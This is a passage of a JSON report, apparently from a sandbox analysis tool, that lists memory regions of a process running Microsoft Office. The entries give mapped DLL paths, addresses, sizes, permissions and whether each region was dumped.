"memory_mapped_file", "start_va": 8791332618240, "timestamp": "00:00:32.743", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2240512, "start_va": 8791344152576, "type": "region", "version": 1 }, "end_va": 8791346393087, "entry_point": 8791344152576, "filename": "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\RICHED20.DLL", "id": "region_251", "name": "riched20.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\riched20.dll", "region_type": "memory_mapped_file", "start_va": 8791344152576, "timestamp": "00:00:32.758", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1564672, "start_va": 8791348805632, "type": "region", "version": 1 }, "end_va": 8791350370303, "entry_point": 8791348805632, "filename": "\\Windows\\System32\\DWrite.dll", "id": "region_252", "name": "dwrite.dll", "norm_filename": "c:\\windows\\system32\\dwrite.dll", "region_type": "memory_mapped_file", "start_va": 8791348805632, "timestamp": "00:00:32.952", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1900544, "start_va": 8791350378496, "type": "region", "version": 1 }, "end_va": 8791352279039, "entry_point": 8791350378496, "filename": "\\Windows\\System32\\d3d10warp.dll", "id": "region_253", "name": "d3d10warp.dll", "norm_filename": "c:\\windows\\system32\\d3d10warp.dll", "region_type": "memory_mapped_file", "start_va": 8791350378496, "timestamp": "00:00:32.964", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1507328, "start_va": 8791352279040, "type": "region", "version": 1 }, "end_va": 8791353786367, "entry_point": 8791352279040, "filename": "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSPTLS.DLL", "id": "region_254", "name": "msptls.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\msptls.dll", "region_type": "memory_mapped_file", "start_va": 8791352279040, "timestamp": "00:00:32.971", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1552384, "start_va": 8791353786368, "type": "region", "version": 1 }, "end_va": 8791355338751, "entry_point": 8791353786368, "filename": "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\1033\\MSOINTL.DLL", "id": "region_255", "name": "msointl.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\1033\\msointl.dll", "region_type": "memory_mapped_file", "start_va": 8791353786368, "timestamp": "00:00:32.997", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 82046976, "start_va": 8791355359232, "type": "region", "version": 1 }, "end_va": 8791437406207, "entry_point": 8791355359232, "filename": "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSORES.DLL", "id": "region_256", "name": "msores.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\msores.dll", "region_type": "memory_mapped_file", "start_va": 8791355359232, "timestamp": "00:00:33.032", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 9572352, "start_va": 8791437410304, "type": "region", "version": 1 }, "end_va": 8791446982655, "entry_point": 8791437410304, "filename": "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSO99LRES.DLL", "id": "region_257", "name": "mso99lres.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso99lres.dll", "region_type": "memory_mapped_file", "start_va": 8791437410304, "timestamp": "00:00:33.035", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 19775488, "start_va": 8791447044096, "type": "region", "version": 1 }, "end_va": 8791466819583, "entry_point": 8791447044096, "filename": "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSO.DLL", "id": "region_258", "name": "mso.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso.dll", "region_type": "memory_mapped_file", "start_va": 8791447044096, "timestamp": "00:00:33.038", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 8175616, "start_va": 8791466835968, "type": "region", "version": 1 }, "end_va": 8791475011583, "entry_point": 8791466835968, "filename": "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso99Lwin32client.dll", "id": "region_259", "name": "mso99lwin32client.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso99lwin32client.dll", "region_type": "memory_mapped_file", "start_va": 8791466835968, "timestamp": "00:00:33.116", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 9351168, "start_va": 8791475027968, "type": "region", "version": 1 }, "end_va": 8791484379135, "entry_point": 8791475027968, "filename": "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso40UIwin32client.dll", "id": "region_260", "name": "mso40uiwin32client.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso40uiwin32client.dll", "region_type": "memory_mapped_file", "start_va": 8791475027968, "timestamp": "00:00:33.119", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4685824, "start_va": 8791484399616, "type": "region", "version": 1 }, "end_va": 8791489085439, "entry_point": 8791484399616, "filename": "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso30win32client.dll", "id": "region_261", "name": "mso30win32client.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso30win32client.dll", "region_type": "memory_mapped_file", "start_va": 8791484399616, "timestamp": "00:00:33.129", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 3162112, "start_va": 8791489118208, "type": "region", "version": 1 }, "end_va": 8791492280319, "entry_point": 8791489118208, "filename": "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso20win32client.dll", "id": "region_262", "name": "mso20win32client.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso20win32client.dll", "region_type": "memory_mapped_file", "start_va": 8791489118208, "timestamp": "00:00:33.140", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 18268160, "start_va": 8791492329472, "type": "region", "version": 1 }, "end_va": 8791510597631, "entry_point": 8791492329472, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\OART.DLL", "id": "region_263", "name": "oart.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\oart.dll", "region_type": "memory_mapped_file", "start_va": 8791492329472, "timestamp": "00:00:33.150", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 811008, "start_va": 8791510614016, "type": "region", "version": 1 }, "end_va": 8791511425023, "entry_point": 8791510614016, "filename": "\\Windows\\System32\\d3d11.dll", "id": "region_264", "name": "d3d11.dll", "norm_filename": "c:\\windows\\system32\\d3d11.dll", "region_type": "memory_mapped_file", "start_va": 8791510614016, "timestamp": "00:00:33.162", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 37351424, "start_va": 8791511465984, "type": "region", "version": 1 }, "end_va": 8791548817407, "entry_point": 8791511465984, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\WWLIB.DLL", "id": "region_265", "name": "wwlib.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\wwlib.dll", "region_type": "memory_mapped_file", "start_va": 8791511465984, "timestamp": "00:00:33.217", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 626688, "start_va": 8791550525440, "type": "region", "version": 1 }, "end_va": 8791551152127, "entry_point": 8791550525440, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll", "id": "region_266", "name": "mscoreei.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll", "region_type": "memory_mapped_file", "start_va": 8791550525440, "timestamp": "00:00:33.233", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 3178496, "start_va": 8791551180800, "type": "region", "version": 1 }, "end_va": 8791554359295, "entry_point": 8791551180800, "filename": "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSO40UIRES.DLL", "id": "region_267", "name": "mso40uires.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso40uires.dll", "region_type": "memory_mapped_file", "start_va": 8791551180800, "timestamp": "00:00:33.264", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 454656, "start_va": 8791555899392, "type": "region", "version": 1 }, "end_va": 8791556354047, "entry_point": 8791555899392, "filename": "\\Windows\\System32\\mscoree.dll", "id": "region_268", "name": "mscoree.dll", "norm_filename": "c:\\windows\\system32\\mscoree.dll", "region_type": "memory_mapped_file", "start_va": 8791555899392, "timestamp": "00:00:33.266", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 770048, "start_va": 8791556358144, "type": "region", "version": 1 }, "end_va": 8791557128191, "entry_point": 8791556358144, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WWINTL.DLL", "id": "region_269", "name": "wwintl.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\1033\\wwintl.dll", "region_type": "memory_mapped_file", "start_va": 8791556358144, "timestamp": "00:00:33.281", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 8791557537792, "type": "region", "version": 1 }, "end_va": 8791557779455, "entry_point": 8791557537792, "filename": "\\Windows\\System32\\mlang.dll", "id": "region_270", "name": "mlang.dll", "norm_filename": "c:\\windows\\system32\\mlang.dll", "region_type": "memory_mapped_file", "start_va": 8791557537792, "timestamp": "00:00:33.289", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 8791592992768, "type": "region", "version": 1 }, "end_va": 8791593041919, "entry_point": 8791592992768, "filename": "\\Windows\\System32\\npmproxy.dll", "id": "region_271", "name": "npmproxy.dll", "norm_filename": "c:\\windows\\system32\\npmproxy.dll", "region_type": "memory_mapped_file", "start_va": 8791592992768, "timestamp": "00:00:33.298", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 462848, "start_va": 8791598891008, "type": "region", "version": 1 }, "end_va": 8791599353855, "entry_point": 8791598891008, "filename": "\\Windows\\System32\\winspool.drv", "id": "region_272", "name": "winspool.drv", "norm_filename": "c:\\windows\\system32\\winspool.drv", "region_type": "memory_mapped_file", "start_va": 8791598891008, "timestamp": "00:00:33.304", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2039808, "start_va": 8791606886400, "type": "region", "version": 1 }, "end_va": 8791608926207, "entry_point": 8791606886400, "filename": "\\Windows\\System32\\msxml6.dll", "id": "region_273", "name": "msxml6.dll", "norm_filename": "c:\\windows\\system32\\msxml6.dll", "region_type": "memory_mapped_file", "start_va": 8791606886400, "timestamp": "00:00:33.312", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12288, "start_va": 8791616716800, "type": "region", "version": 1 }, "end_va": 8791616729087, "entry_point": 8791616716800, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-core-file-l1-2-0.dll", "id": "region_274", "name": "api-ms-win-core-file-l1-2-0.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-core-file-l1-2-0.dll", "region_type": "memory_mapped_file", "start_va": 8791616716800, "timestamp": "00:00:33.378", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12288, "start_va": 8791616782336, "type": "region", "version": 1 }, "end_va": 8791616794623, "entry_point": 8791616782336, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-core-processthreads-l1-1-1.dll", "id": "region_275", "name": "api-ms-win-core-processthreads-l1-1-1.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-core-processthreads-l1-1-1.dll", "region_type": "memory_mapped_file", "start_va": 8791616782336, "timestamp": "00:00:33.385", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12288, "start_va": 8791616847872, "type": "region", "version": 1 }, "end_va": 8791616860159, "entry_point": 8791616847872, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-core-synch-l1-2-0.dll", "id": "region_276", "name": "api-ms-win-core-synch-l1-2-0.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-core-synch-l1-2-0.dll", "region_type": "memory_mapped_file", "start_va": 8791616847872, "timestamp": "00:00:33.392", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12288, "start_va": 8791617110016, "type": "region", "version": 1 }, "end_va": 8791617122303, "entry_point": 8791617110016, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-core-localization-l1-2-0.dll", "id": "region_277", "name": "api-ms-win-core-localization-l1-2-0.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-core-localization-l1-2-0.dll", "region_type": "memory_mapped_file", "start_va": 8791617110016, "timestamp": "00:00:33.399", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12288, "start_va": 8791617175552, "type": "region", "version": 1 }, "end_va": 8791617187839, "entry_point": 8791617175552, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-core-file-l2-1-0.dll", "id": "region_278", "name": "api-ms-win-core-file-l2-1-0.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-core-file-l2-1-0.dll", "region_type": "memory_mapped_file", "start_va": 8791617175552, "timestamp": "00:00:33.405", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12288, "start_va": 8791619076096, "type": "region", "version": 1 }, "end_va": 8791619088383, "entry_point": 8791619076096, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-core-timezone-l1-1-0.dll", "id": "region_279", "name": "api-ms-win-core-timezone-l1-1-0.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-core-timezone-l1-1-0.dll", "region_type": "memory_mapped_file", "start_va": 8791619076096, "timestamp": "00:00:33.411", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 991232, "start_va": 8791619403776, "type": "region", "version": 1 }, "end_va": 8791620395007, "entry_point": 8791619403776, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\ucrtbase.dll", "id": "region_280", "name": "ucrtbase.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\ucrtbase.dll", "region_type": "memory_mapped_file", "start_va": 8791619403776, "timestamp": "00:00:33.418", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 8791622221824, "type": "region", "version": 1 }, "end_va": 8791622250495, "entry_point": 8791622221824, "filename": "\\Windows\\System32\\msimg32.dll", "id": "region_281", "name": "msimg32.dll", "norm_filename": "c:\\windows\\system32\\msimg32.dll", "region_type": "memory_mapped_file", "start_va": 8791622221824, "timestamp": "00:00:33.473", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1216512, "start_va": 8791622287360, "type": "region", "version": 1 }, "end_va": 8791623503871, "entry_point": 8791622287360, "filename": "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\C2R64.dll", "id": "region_282", "name": "c2r64.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r64.dll", "region_type": "memory_mapped_file", "start_va": 8791622287360, "timestamp": "00:00:33.480", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 499712, "start_va": 8791623532544, "type": "region", "version": 1 }, "end_va": 8791624032255, "entry_point": 8791623532544, "filename": "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppvIsvStream64.dll", "id": "region_283", "name": "appvisvstream64.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream64.dll", "region_type": "memory_mapped_file", "start_va": 8791623532544, "timestamp": "00:00:33.491", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000397-addr_0x00000000099b0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_11", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 161153024, "type": "region", "version": 1 }, "end_va": 162201599, "entry_point": 0, "filename": null, "id": "region_397", "name": "private_0x00000000099b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 161153024, "timestamp": "00:00:37.940", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000402-addr_0x000007fffff78000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_12", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092465152, "type": "region", "version": 1 }, "end_va": 8796092473343, "entry_point": 0, "filename": null, "id": "region_402", "name": "private_0x000007fffff78000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092465152, "timestamp": "00:00:37.958", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000403-addr_0x000007fffff7a000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_13", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092473344, "type": "region", "version": 1 }, "end_va": 8796092481535, "entry_point": 0, "filename": null, "id": "region_403", "name": "private_0x000007fffff7a000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092473344, "timestamp": "00:00:37.959", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000404-addr_0x0000000002a10000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_14", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 44105728, "type": "region", "version": 1 }, "end_va": 44109823, "entry_point": 0, "filename": null, "id": "region_404", "name": "private_0x0000000002a10000", "norm_filename": null, "region_type": "private_memory", "start_va": 44105728, "timestamp": "00:00:38.102", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000405-addr_0x0000000002a20000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_15", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 44171264, "type": "region", "version": 1 }, "end_va": 44175359, "entry_point": 0, "filename": null, "id": "region_405", "name": "private_0x0000000002a20000", "norm_filename": null, "region_type": "private_memory", "start_va": 44171264, "timestamp": "00:00:38.102", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000406-addr_0x0000000002a30000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_16", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 44236800, "type": "region", "version": 1 }, "end_va": 44240895, "entry_point": 0, "filename": null, "id": "region_406", "name": "private_0x0000000002a30000", "norm_filename": null, "region_type": "private_memory", "start_va": 44236800, "timestamp": "00:00:38.102", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000407-addr_0x0000000002c70000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_17", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 46596096, "type": "region", "version": 1 }, "end_va": 46600191, "entry_point": 0, "filename": null, "id": "region_407", "name": "private_0x0000000002c70000", "norm_filename": null, "region_type": "private_memory", "start_va": 46596096, "timestamp": "00:00:38.103", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000408-addr_0x0000000002e80000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_18", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 48758784, "type": "region", "version": 1 }, "end_va": 49807359, "entry_point": 0, "filename": null, "id": "region_408", "name": "private_0x0000000002e80000", "norm_filename": null, "region_type": "private_memory", "start_va": 48758784, "timestamp": "00:00:38.103", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000409-addr_0x0000000002f80000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_19", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 49807360, "type": "region", "version": 1 }, "end_va": 49811455, "entry_point": 0, "filename": null, "id": "region_409", "name": "private_0x0000000002f80000", "norm_filename": null, "region_type": "private_memory", "start_va": 49807360, "timestamp": "00:00:38.103", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000410-addr_0x0000000002f90000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_20", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 49872896, "type": "region", "version": 1 }, "end_va": 49876991, "entry_point": 0, "filename": null, "id": "region_410", "name": "private_0x0000000002f90000", "norm_filename": null, "region_type": "private_memory", "start_va": 49872896, "timestamp": "00:00:38.103", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000411-addr_0x0000000002fa0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_21", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 49938432, "type": "region", "version": 1 }, "end_va": 49942527, "entry_point": 0, "filename": null, "id": "region_411", "name": "private_0x0000000002fa0000", "norm_filename": null, "region_type": "private_memory", "start_va": 49938432, "timestamp": "00:00:38.105", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000412-addr_0x0000000002fb0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_22", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 50003968, "type": "region", "version": 1 }, "end_va": 50008063, "entry_point": 0, "filename": null, "id": "region_412", "name": "private_0x0000000002fb0000", "norm_filename": null, "region_type": "private_memory", "start_va": 50003968, "timestamp": "00:00:38.105", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000413-addr_0x0000000004790000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_23", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 75038720, "type": "region", "version": 1 }, "end_va": 75042815, "entry_point": 0, "filename": null, "id": "region_413", "name": "private_0x0000000004790000", "norm_filename": null, "region_type": "private_memory", "start_va": 75038720, "timestamp": "00:00:38.106", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000414-addr_0x00000000049a0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_24", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 77201408, "type": "region", "version": 1 }, "end_va": 77205503, "entry_point": 0, "filename": null, "id": "region_414", "name": "private_0x00000000049a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 77201408, "timestamp": "00:00:38.106", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000415-addr_0x0000000004c90000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_25", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 80281600, "type": "region", "version": 1 }, "end_va": 80285695, "entry_point": 0, "filename": null, "id": "region_415", "name": "private_0x0000000004c90000", "norm_filename": null, "region_type": "private_memory", "start_va": 80281600, "timestamp": "00:00:38.106", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000416-addr_0x0000000004ca0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_26", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 80347136, "type": "region", "version": 1 }, "end_va": 80351231, "entry_point": 0, "filename": null, "id": "region_416", "name": "private_0x0000000004ca0000", "norm_filename": 